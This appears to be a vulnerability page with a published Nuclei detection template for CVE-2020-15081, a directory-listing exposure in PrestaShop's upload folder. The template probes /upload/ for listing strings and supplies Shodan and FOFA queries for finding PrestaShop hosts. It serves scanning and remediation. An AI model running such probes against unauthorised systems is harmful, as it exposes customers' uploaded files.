漏洞描述
PrestaShop versions after 1.5.0.0 and before 1.7.6.6 are vulnerable to information exposure through directory listing in the upload directory due to a missing index.php file.
CVE-2020-15081: PrestaShop < 1.7.6.6 - Information Exposure via Upload Directory
PoC代码[已公开]
id: CVE-2020-15081
info:
name: PrestaShop < 1.7.6.6 - Information Exposure via Upload Directory
author: 0x_Akoko
severity: low
description: |
PrestaShop versions after 1.5.0.0 and before 1.7.6.6 are vulnerable to information exposure through directory listing in the upload directory due to a missing index.php file.
impact: |
Attackers can enumerate uploaded files potentially exposing sensitive customer data, invoices, or internal documents.
remediation: |
Upgrade to PrestaShop version 1.7.6.6 or later, or add an empty index.php file in the upload directory as a workaround.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-15081
- https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-997j-f42g-x57c
- https://github.com/PrestaShop/PrestaShop/commit/bac9ea6936b073f84b1abd9864317af3713f1901
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-15081
cwe-id: CWE-548
epss-score: 0.00232
epss-percentile: 0.45809
metadata:
verified: true
max-request: 1
vendor: prestashop
product: prestashop
shodan-query: http.component:"PrestaShop"
fofa-query: app="PrestaShop"
tags: cve,cve2020,prestashop,exposure,directory-listing
http:
- method: GET
path:
- "{{BaseURL}}/upload/"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(body, "Index of", "Directory listing for", "[To Parent Directory]", "<title>Index of")'
condition: and
# digest: 490a0046304402204d71ee4f5e4a1bd2f02408be8e983180ca7e939135b8338ab1ce34bcff062bef02204fcece941fada052f5f913a3ae88e7225368cc5ba0d05c96aee62ccc9fbb31d2:922c64590222798bb761d5b6d8e72950